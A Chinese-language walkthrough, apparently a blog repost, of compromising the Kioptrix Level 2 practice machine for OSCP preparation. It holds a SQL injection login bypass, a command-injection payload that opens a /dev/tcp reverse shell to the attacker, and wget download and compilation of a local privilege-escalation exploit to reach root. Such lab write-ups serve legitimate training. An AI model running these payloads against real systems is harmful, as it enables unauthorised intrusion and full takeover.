当前位置: 首页 > news >正文

OSCP备战-kioptrix level _2详细分析

为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么

探测目标IP

arp-scan -l


得出目标IP:192.168.155.164
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果如下:

└─$ nmap -sV -sT --min-rate 1000  -p1-65535 192.168.155.164
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 20:55 EDT
Nmap scan report for 192.168.155.164
Host is up (0.0034s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
738/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)


80端口

访问一下,开局一个登录框


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.164 -e *


访问http://192.168.155.164/manual/index.html
apache页面,好像用处不大
回到登录框
端口开启有3306数据库
尝试SQL:
 

admin' or 1=1 #


进入后台,好像又空白了,但是网站嘛,查看源码一下


发现被注释掉的一部分源码
要恢复页面,bp抓返回包,去掉引号再放开,发现页面恢复正常了


网站执行Ping命令,很容易想到代码执行漏洞
试试看:

192.168.155.142;ls


回显显示出结果:index.php、pingit.php

kali开启监听:

nc -lvvp 9001


反弹shell:

192.168.155.142;sh -i >& /dev/tcp/192.168.155.142/9001 0>&1


查看kali,有结果了


查看id,显示:

uid=48(apache) gid=48(apache) groups=48(apache)


普通用户需要提权
查看系统版本:

uname -a


显示:

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


查看详细的发行版系统版本信息:

cat /etc/*-release


查找版本漏洞:
 

searchsploit linux 2.6 centos 4.5


下载:

searchsploit -m 9542.c 


查看要求:

vim 9542.c 


因为要求将Poc下载到靶机里,我们通过反弹的shell实现
上kali机去开启一下服务:

python -m http.server 80


回到连接靶机,下载脚本:

cd /tmp
wget http://192.168.155.142/9542.c
ls


编译文件:

gcc 9542.c -o exploit
./exploit
whoami


权限是root了,大功告成

 

http://www.dtcms.com/a/179035.html

相关文章:

  • git的常用命令详解
  • Hex文件格式解析
  • numpy pandas
  • 【渗透测试】反序列化漏洞的原理、利用方式与防范措施
  • RabbitMQ学习(第二天)
  • [机器学习介绍与定义]机器学习-part1
  • [数据库之十三] 数据库索引之散列索引
  • 量子通信技术及其在信息安全中的应用:开启无条件安全通信的新时代
  • 视频添加字幕脚本分享
  • 【计算机网络 第8版】谢希仁编著 第四章网络层 题型总结2
  • Kubernetes 手动部署 Prometheus 学习计划
  • 笔记本电脑实现网线内网 + Wi-Fi外网同时使用的配置方案
  • 基于FPGA控制PCF8591开展ADC采样,以采样烟雾模块输出模拟电压为例(IIC通信)
  • 宴会综合生产实训室融合数字化宴会管理路径
  • flow-matching 之学习matcha-tts cosyvoice
  • 企业级UI测试的“双保险”:TestComplete的智能对象识别与详细报告功能
  • 本地聊天机器人部署方案
  • 安卓基础(静态方法)
  • 网络字节序 - 大端
  • Java的对象头:原理与源码详解
  • 定时任务分布式锁SchedulerLock
  • iptables 访问控制列表使用记录
  • Oracle免费认证来袭
  • 国际数字影像产业园,打造金牛区数字文创新地标
  • 堡塔云WAF免费WEB防火墙,从搭建到应用
  • 【Science Advances】北京邮电大学突破:基于MEMS-超表面的多阶涡旋光束高速切换技术
  • 枚举 · 例8扩展-校门外的树:hard
  • Java:跨越时代的编程语言,持续引领技术变革
  • 每日学习Java之一万个为什么(待完善)
  • ABP vNext + Dapr 实现云原生微服务治理